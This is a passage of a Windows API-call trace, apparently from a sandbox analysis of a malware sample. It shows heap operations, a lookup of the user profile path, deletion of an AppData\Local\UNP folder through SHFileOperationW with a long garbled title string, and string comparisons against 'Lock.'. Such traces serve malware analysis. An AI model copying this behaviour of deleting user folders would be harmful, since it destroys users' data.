lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0204.813] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0204.813] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0204.813] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0204.813] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0204.813] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0204.813] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0204.813] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0204.813] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0204.813] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0204.813] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0204.813] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0204.813] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a683a8 [0204.813] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72298 [0204.813] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0204.813] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0204.813] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0204.813] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa570 [0204.813] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0204.813] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0204.813] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa5b8 [0204.813] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0204.813] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0204.813] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0204.813] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0204.813] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722a8 [0204.813] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0204.813] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0204.813] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0204.813] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0204.814] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0204.814] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0204.814] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0204.814] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0204.814] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0204.814] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0204.814] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722b8 [0204.814] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7060 [0204.814] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0204.814] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x80) returned 0x29f7878 [0204.814] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d78 | out: hHeap=0x2af0000) returned 1 [0204.814] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0204.814] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72278 [0204.814] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0204.814] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0204.814] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0204.814] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7060 | out: hHeap=0x2af0000) returned 1 [0204.814] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0204.814] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0204.814] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0204.814] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0204.814] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0204.814] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0204.814] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72328 [0204.814] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0204.815] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0204.815] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0204.815] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0204.815] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0204.815] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0204.815] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x44) returned 0x2a5d9d0 [0204.815] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Local/UNP", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\UNP", lpFilePart=0x8cf650*="UNP") returned 0x21 [0204.815] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5d9d0 | out: hHeap=0x2af0000) returned 1 [0204.815] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\UNP" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\unp")) returned 0x10 [0204.815] SHFileOperationW (in: lpFileOp=0x8cf868*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\FD1HVy\\AppData\\Local\\UNP", pTo=0x0, fFlags=0x614, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="籨ǿ畍䑬癩噗ֽ㣚ᵗ˷殍Ķᐊ둲?ᒰ陣ꙭ䐫୥垇摩䱥呲훷뭬뙯䋈䡹氨犖灣뉹᙭捦㸩㵓穬㡗标公ᒞ◶쁆⋓畑臞涃秘ِ໩㘍潸ѵ噾බ⼄䘗똆伜陰嬈ᬡ㞙䦽箣㤵칗ஆ룑䴻⪱谐໅┺㎻ꌇᐟፓ潐?涟鷮掊鼥䘕畬띳贂梕畂笛贆襔꿡惿濸桬汥㍰匲瀺潨魫盙䕰舤瑴⅗恓覠쉎吋眶蘏큩[瑁扴獵惏ꋗ䁳倠㍹쐟н蹣최維矓ꜯᐝ낆쪆㍶䢢䶇?儕⏁㮰剭蔣飇䥬䇻栵刬洠傧겴玀뱢颻㝤䱶慯ᬝ正捓䛚껐景䔟螃䄉᭤慎항ာ션Ѱ卧脮样ᯋ좐㈶퐨譁옙ꛬ﹡̻婃籙밚䙩虓䔁ㆣ芵⮣鱌坶ぉᖴ얶䄵ꙴ嬣厶챰礟摴턦䡡轫楐挦梧൜栆?땋䞎罋怦똱砕⑐坨⨛蜎培껛铕닥璍嶫਺Җᒖꊵ䞉啰㝍檑⣅昩궬榶䔌㜵끛ꬅ㥭⡑汒酯墣엘≩ᵷ뜱॥ጐᜫ⼯떱垴ㅵ䓺둘㭡礚㥰獼噫굻獰慞塣?喆◍䁖艵༜喻䰭扡튚앱䞘狒䱤毈惌ⱶ潪幃呰Ṕ䵤囌⡘솆醥䵅㋱倓콬鬕쁮Ϛ꒚溔嚸槐탲셱⌖䜱押㶬짌ꄖ唗汮촛坩䔎핽?龎ଗȀ涌ꋦಮ퀻䋝ᄀᘇ㠜픭状梙涏⋣珙⍏㨬ᭂᰯ專ࢋꕅ̋瀮뾊ㅫ쟆揥厪塹祼췚ࢡ砕턎?黩ᢰ㝬嗢擴ຊ瓛艡ᵓ蛛왡落ꪺᯙ畄⁣錮굽춡ꏤᕘ媤估⋇辰鼠摁Ɽ≏٬䇦ᬋ퇡嘬힕≏๬挌嗗읓䦻㡳靮ᜃ爄칐ᕷ됆党ꟑ൩᥯맱獁죚⒀덍륍ⷜ篭ἐᒜ壸精鰥Ḯ茋᲎饰䏘໛u䙤痐붮⥅攖┱傌﮼쾳ᕡᙁ伏䵅舒硖鎀䱨懇䱛เ邏ጶᶐ匙씆Ĕ叧葿⼑㪚票⥤녋᣷㥏ト㖀玳鑴煯缡ά웯勗㤹㸙湛嘒᭐Ԏ៬䱓䵃Ϊ瑒䈬꺜瞔ᾰȄ凘娩捸?犺䶽삕Ⅵֶ逯끘慁熰睊侳ก쬬Ľ佤㑦磦༆礛ᅐ힠나敯硇⴨၈밈⬗뗴롧坃㌝둺䬫䬡睥蕝껢ᡮ᲍肽勂ᾄ䄅?ઔ煗簼鳥ꝸቮ椒ꗎ抄皁詽汲ᔩ뚌愇렩慪枰蓺ꭆ吋歯餔୪출렣☎䜅츐槞枌ࠂ뫞䶅鼴㐂ⴰ䯘쭗ꁸ萵棜枞ϰℴ畺惫ɣ脠∻ҍ䅸汣笿梗旲撒ᆣ삗芭퇛뽌䭯귭㿣⦃曥ସ㛭?⑛讔ﬔ?匏ٻ扸ต靿虹뜄魔檆獵ꄣ㣧㠬??桓໪샤瑵槐原⋮竻湤爦붧㒭Ȃ䦌㱭蕌ᶁﻣ齟匣oᡜ㡬怭揮㭠求㽮ᄩ➚὜⦇什㶃綄祜≐⌸⯺໖{䦝ꁣभܛ릻?뤊㻇령컃및܆ᜆᒅ쪩웓圜堣제?䲄Ꮭⱁ᎙牁ୣ둸娸㏯鈲椞琌㋱軽䅜ᴈ낲攣ᜥ?魤⦰椦퉸嫽䌚䃤ࡧ䏽ఈ䁊誽Ồ꧜강⽰䍄亄瑣䷍꓋档求䓛鸥瑰⇷᱃ܜ옲黏띝쬎䞏쬕㠦҉ꬆ剺⻂퀖祬睆蓿鯃剻懤ℱ敩?汽퀓牏뉧⾞ϰ⤖䉅鍫湒泮㐓⭱魃솭냊睳匕蜮탧嘪牂册䟥煱唰᭗썆፪丞ꋃ君丈꣎ଦ?圓끎漞쪱沀堁⽺햵皖⥸簧籑?琫멑쀗괂俱ʦ畮혙⁰䴩婫摲顑采鲲쵹潓ーꃢ䑡?卌䑉⹆⎳乴཭༠⤣ƀ䟚㉕褲旇찘᭴ὕㄹ̆䚑쯴ꂙ옻⫭修䡮冧戈툔뙫ᾥڂⅼᅧ?䇁弣꯯⭤ꓸꡂ硴潭萕ᰊ佋?䨣ฦ硬䱹켄撚欦휖䦫ꞟ〢頧೿驩榦଄ₒ؟퍍괴⠦ᠧ┇꘣퍹ꐴ鬩!ਂꚚ驩뤉䷜អ퉸歏ꀈ偅ࠔ㲽냅଄慂╳ꌂ㶒?燚獣侪腵沓妣ၸ樔?琬瑖ោ县⹈撸㝆퍈煮㐴䖍沔捹蛡減㨧ΰ鞸?❷ꉡ?摛襾ꮷ䞃ݡ踘⬰歆뱲䕥灀❹慍〟贤騁똔ᰟ杅也ꩯ祦䅪圩斍伩ፁ뺲ꁛ㰯샤莢?『떂䣘኎槦妙膎Ӟၤ⹝潢劊끯골ḱ쫩ꄸ쓆咬ੰ丛윜㢎⣖⥣唛劫쮪灰❇삁Ҩ叮扵䌥䀶?違浳潚᱊㣰﹀械큫?偮礩?黠랭ꯨ栞柠䢍粙턭ⴜ斔舝⵨勥촐롤呯Ṱ琞溁耱Ɽ쑲겍Ꙑﻑ龜遮企ল月墡Ǡゑ⾌逝ၖᵳ꘨튡歛洔ᵉ뀣?㘈倷鹴呋૗榞〗앢桁禣죇ᒁ?낰㎇၍੆뢲Ըāʼnꈛꏔ沐蚃녨奦呤豇嫀洜䉕㭔ⵠ刃핵᛭屎藡롃顃杬ᙂ噴?榇霫⡦Ұ枌᭔୻㪝뜊뜗⌋⎭瀕캵챩쯍䀥꠷ọ덠ቭ徠嵥㴮筴Ꮌ匷?ഊ☓気?솟ṩ퀉?靄等硢긜蠉Ἥ㸉蟜ᥩ좧鳪³῭닢ᰫᎥ穗℞刕曚ꂱ箰뜩癛훇ꔶ᷍⍓䜛㕗驀㐿狢๤茇贅啁級ஐ捗歡䍺㴙藌䘵릙्抩쐸㒪᲍蒛ⵣ᭝拴緋ᛞ䟈嘙ᝫ졣屩)䌍Ў鐄㋵ㄥ딮⃠更᥼ሼ䆼訟뗭涆児錧餝娆ࠡ侏ꛜౕ쌫裊팛浏៑ֻ釆攣뭙桙ᡩᏱ폪腚Ⅴ楖楳㏕㊺농፟䖀䟙곯꣢칣棘㕛ⷀΪ㔝虘ऌ펾潔羣ᙱ뀩泒ﯤ䔠蠂㠪Ϲ肾魐垜唬⤘ꅀ숛찈䏷ຈ㊽ꗋ䱛ᮄ耸鏑뢉ŝ䘭?瘹䢄묑䞇똭᫁笉ᯥ㖤퀑љ榔䗋㥁嵭䵘뾧ڊ╛漫热쯙㉧缿囓ꇰ焋뮁뇺Š턅炿셹穎щ휢뒬跕鈧䞂껑砭玿䷋酇蹢殲鑁ɚ뤏禟⥂큸⵽爲堤獀ऀ賣웕삮ౕᡡ濏씸探厱?畑ࢇꗇ靚ﱋ뇩ﮆ癡?匈떍斜ᅭ쁄䝮蹽勂羁䥽Ự봣ᕱځ⸕ꤗ叙᪱䜰퍯驁椾倯殞豘੸唿牮㓇ꛠⶍ歵搞⥔⋄촭䞹ꐄ齚?莬ꁓ졦?ࣚ혮疗ㄫ鎀锽针虚℅뱗⡲ꂃ㠼⇶宄﵇敗櫀䠟ㄥЩ嘎續둈舅뿽䱮⌻?肊⥍殻湏ᷚ⍓濉耹৫喦䍈炠嵅?⮖ꝃ?̴⎄⌝䕆ࡖ٤ᬻ砓㝫㌈쯪飳?㴨資伪᫃蒊晴貣È퐳䈄렉栁ⶅ惂吡楣ﴴ榦ꞟ鑮ヤҗ༕괴骃ᐑቻഄ퍳䴴˓Ѓ጗ꡚ偵뵴Ё⥯ꐴऔӓ뜹붼䔤䰶吁뫬伥翳氁⌀ଁਁ") | out: lpFileOp=0x8cf868*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\FD1HVy\\AppData\\Local\\UNP", pTo=0x0, fFlags=0x614, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="籨ǿ畍䑬癩噗ֽ㣚ᵗ˷殍Ķᐊ둲?ᒰ陣ꙭ䐫୥垇摩䱥呲훷뭬뙯䋈䡹氨犖灣뉹᙭捦㸩㵓穬㡗标公ᒞ◶쁆⋓畑臞涃秘ِ໩㘍潸ѵ噾බ⼄䘗똆伜陰嬈ᬡ㞙䦽箣㤵칗ஆ룑䴻⪱谐໅┺㎻ꌇᐟፓ潐?涟鷮掊鼥䘕畬띳贂梕畂笛贆襔꿡惿濸桬汥㍰匲瀺潨魫盙䕰舤瑴⅗恓覠쉎吋眶蘏큩[瑁扴獵惏ꋗ䁳倠㍹쐟н蹣최維矓ꜯᐝ낆쪆㍶䢢䶇?儕⏁㮰剭蔣飇䥬䇻栵刬洠傧겴玀뱢颻㝤䱶慯ᬝ正捓䛚껐景䔟螃䄉᭤慎항ာ션Ѱ卧脮样ᯋ좐㈶퐨譁옙ꛬ﹡̻婃籙밚䙩虓䔁ㆣ芵⮣鱌坶ぉᖴ얶䄵ꙴ嬣厶챰礟摴턦䡡轫楐挦梧൜栆?땋䞎罋怦똱砕⑐坨⨛蜎培껛铕닥璍嶫਺Җᒖꊵ䞉啰㝍檑⣅昩궬榶䔌㜵끛ꬅ㥭⡑汒酯墣엘≩ᵷ뜱॥ጐᜫ⼯떱垴ㅵ䓺둘㭡礚㥰獼噫굻獰慞塣?喆◍䁖艵༜喻䰭扡튚앱䞘狒䱤毈惌ⱶ潪幃呰Ṕ䵤囌⡘솆醥䵅㋱倓콬鬕쁮Ϛ꒚溔嚸槐탲셱⌖䜱押㶬짌ꄖ唗汮촛坩䔎핽?龎ଗȀ涌ꋦಮ퀻䋝ᄀᘇ㠜픭状梙涏⋣珙⍏㨬ᭂᰯ專ࢋꕅ̋瀮뾊ㅫ쟆揥厪塹祼췚ࢡ砕턎?黩ᢰ㝬嗢擴ຊ瓛艡ᵓ蛛왡落ꪺᯙ畄⁣錮굽춡ꏤᕘ媤估⋇辰鼠摁Ɽ≏٬䇦ᬋ퇡嘬힕≏๬挌嗗읓䦻㡳靮ᜃ爄칐ᕷ됆党ꟑ൩᥯맱獁죚⒀덍륍ⷜ篭ἐᒜ壸精鰥Ḯ茋᲎饰䏘໛u䙤痐붮⥅攖┱傌﮼쾳ᕡᙁ伏䵅舒硖鎀䱨懇䱛เ邏ጶᶐ匙씆Ĕ叧葿⼑㪚票⥤녋᣷㥏ト㖀玳鑴煯缡ά웯勗㤹㸙湛嘒᭐Ԏ៬䱓䵃Ϊ瑒䈬꺜瞔ᾰȄ凘娩捸?犺䶽삕Ⅵֶ逯끘慁熰睊侳ก쬬Ľ佤㑦磦༆礛ᅐ힠나敯硇⴨၈밈⬗뗴롧坃㌝둺䬫䬡睥蕝껢ᡮ᲍肽勂ᾄ䄅?ઔ煗簼鳥ꝸቮ椒ꗎ抄皁詽汲ᔩ뚌愇렩慪枰蓺ꭆ吋歯餔୪출렣☎䜅츐槞枌ࠂ뫞䶅鼴㐂ⴰ䯘쭗ꁸ萵棜枞ϰℴ畺惫ɣ脠∻ҍ䅸汣笿梗旲撒ᆣ삗芭퇛뽌䭯귭㿣⦃曥ସ㛭?⑛讔ﬔ?匏ٻ扸ต靿虹뜄魔檆獵ꄣ㣧㠬??桓໪샤瑵槐原⋮竻湤爦붧㒭Ȃ䦌㱭蕌ᶁﻣ齟匣oᡜ㡬怭揮㭠求㽮ᄩ➚὜⦇什㶃綄祜≐⌸⯺໖{䦝ꁣभܛ릻?뤊㻇령컃및܆ᜆᒅ쪩웓圜堣제?䲄Ꮭⱁ᎙牁ୣ둸娸㏯鈲椞琌㋱軽䅜ᴈ낲攣ᜥ?魤⦰椦퉸嫽䌚䃤ࡧ䏽ఈ䁊誽Ồ꧜강⽰䍄亄瑣䷍꓋档求䓛鸥瑰⇷᱃ܜ옲黏띝쬎䞏쬕㠦҉ꬆ剺⻂퀖祬睆蓿鯃剻懤ℱ敩?汽퀓牏뉧⾞ϰ⤖䉅鍫湒泮㐓⭱魃솭냊睳匕蜮탧嘪牂册䟥煱唰᭗썆፪丞ꋃ君丈꣎ଦ?圓끎漞쪱沀堁⽺햵皖⥸簧籑?琫멑쀗괂俱ʦ畮혙⁰䴩婫摲顑采鲲쵹潓ーꃢ䑡?卌䑉⹆⎳乴཭༠⤣ƀ䟚㉕褲旇찘᭴ὕㄹ̆䚑쯴ꂙ옻⫭修䡮冧戈툔뙫ᾥڂⅼᅧ?䇁弣꯯⭤ꓸꡂ硴潭萕ᰊ佋?䨣ฦ硬䱹켄撚欦휖䦫ꞟ〢頧೿驩榦଄ₒ؟퍍괴⠦ᠧ┇꘣퍹ꐴ鬩!ਂꚚ驩뤉䷜អ퉸歏ꀈ偅ࠔ㲽냅଄慂╳ꌂ㶒?燚獣侪腵沓妣ၸ樔?琬瑖ោ县⹈撸㝆퍈煮㐴䖍沔捹蛡減㨧ΰ鞸?❷ꉡ?摛襾ꮷ䞃ݡ踘⬰歆뱲䕥灀❹慍〟贤騁똔ᰟ杅也ꩯ祦䅪圩斍伩ፁ뺲ꁛ㰯샤莢?『떂䣘኎槦妙膎Ӟၤ⹝潢劊끯골ḱ쫩ꄸ쓆咬ੰ丛윜㢎⣖⥣唛劫쮪灰❇삁Ҩ叮扵䌥䀶?違浳潚᱊㣰﹀械큫?偮礩?黠랭ꯨ栞柠䢍粙턭ⴜ斔舝⵨勥촐롤呯Ṱ琞溁耱Ɽ쑲겍Ꙑﻑ龜遮企ল月墡Ǡゑ⾌逝ၖᵳ꘨튡歛洔ᵉ뀣?㘈倷鹴呋૗榞〗앢桁禣죇ᒁ?낰㎇၍੆뢲Ըāʼnꈛꏔ沐蚃녨奦呤豇嫀洜䉕㭔ⵠ刃핵᛭屎藡롃顃杬ᙂ噴?榇霫⡦Ұ枌᭔୻㪝뜊뜗⌋⎭瀕캵챩쯍䀥꠷ọ덠ቭ徠嵥㴮筴Ꮌ匷?ഊ☓気?솟ṩ퀉?靄等硢긜蠉Ἥ㸉蟜ᥩ좧鳪³῭닢ᰫᎥ穗℞刕曚ꂱ箰뜩癛훇ꔶ᷍⍓䜛㕗驀㐿狢๤茇贅啁級ஐ捗歡䍺㴙藌䘵릙्抩쐸㒪᲍蒛ⵣ᭝拴緋ᛞ䟈嘙ᝫ졣屩)䌍Ў鐄㋵ㄥ딮⃠更᥼ሼ䆼訟뗭涆児錧餝娆ࠡ侏ꛜౕ쌫裊팛浏៑ֻ釆攣뭙桙ᡩᏱ폪腚Ⅴ楖楳㏕㊺농፟䖀䟙곯꣢칣棘㕛ⷀΪ㔝虘ऌ펾潔羣ᙱ뀩泒ﯤ䔠蠂㠪Ϲ肾魐垜唬⤘ꅀ숛찈䏷ຈ㊽ꗋ䱛ᮄ耸鏑뢉ŝ䘭?瘹䢄묑䞇똭᫁笉ᯥ㖤퀑љ榔䗋㥁嵭䵘뾧ڊ╛漫热쯙㉧缿囓ꇰ焋뮁뇺Š턅炿셹穎щ휢뒬跕鈧䞂껑砭玿䷋酇蹢殲鑁ɚ뤏禟⥂큸⵽爲堤獀ऀ賣웕삮ౕᡡ濏씸探厱?畑ࢇꗇ靚ﱋ뇩ﮆ癡?匈떍斜ᅭ쁄䝮蹽勂羁䥽Ự봣ᕱځ⸕ꤗ叙᪱䜰퍯驁椾倯殞豘੸唿牮㓇ꛠⶍ歵搞⥔⋄촭䞹ꐄ齚?莬ꁓ졦?ࣚ혮疗ㄫ鎀锽针虚℅뱗⡲ꂃ㠼⇶宄﵇敗櫀䠟ㄥЩ嘎續둈舅뿽䱮⌻?肊⥍殻湏ᷚ⍓濉耹৫喦䍈炠嵅?⮖ꝃ?̴⎄⌝䕆ࡖ٤ᬻ砓㝫㌈쯪飳?㴨資伪᫃蒊晴貣È퐳䈄렉栁ⶅ惂吡楣ﴴ榦ꞟ鑮ヤҗ༕괴骃ᐑቻഄ퍳䴴˓Ѓ጗ꡚ偵뵴Ё⥯ꐴऔӓ뜹붼䔤䰶吁뫬伥翳氁⌀ଁਁ")) returned 0 [0205.134] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0205.134] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0205.134] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0205.134] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0205.134] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0205.134] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0205.134] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0205.134] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0205.134] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0205.134] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0205.134] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721e8 [0205.134] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72278 [0205.134] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0205.134] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0205.134] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721f8 [0205.134] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0205.134] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0205.134] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0205.134] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0205.134] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0205.134] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0205.135] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0205.135] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0205.135] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VirtualStore", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0205.135] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="irtualStore", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0205.135] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rtualStore", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0205.135] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tualStore", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0205.135] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ualStore", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0205.135] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="alStore", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0205.135] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lStore", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0205.135] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Store", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0205.135] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0205.135] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0205.135] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0205.135] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0205.135] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, 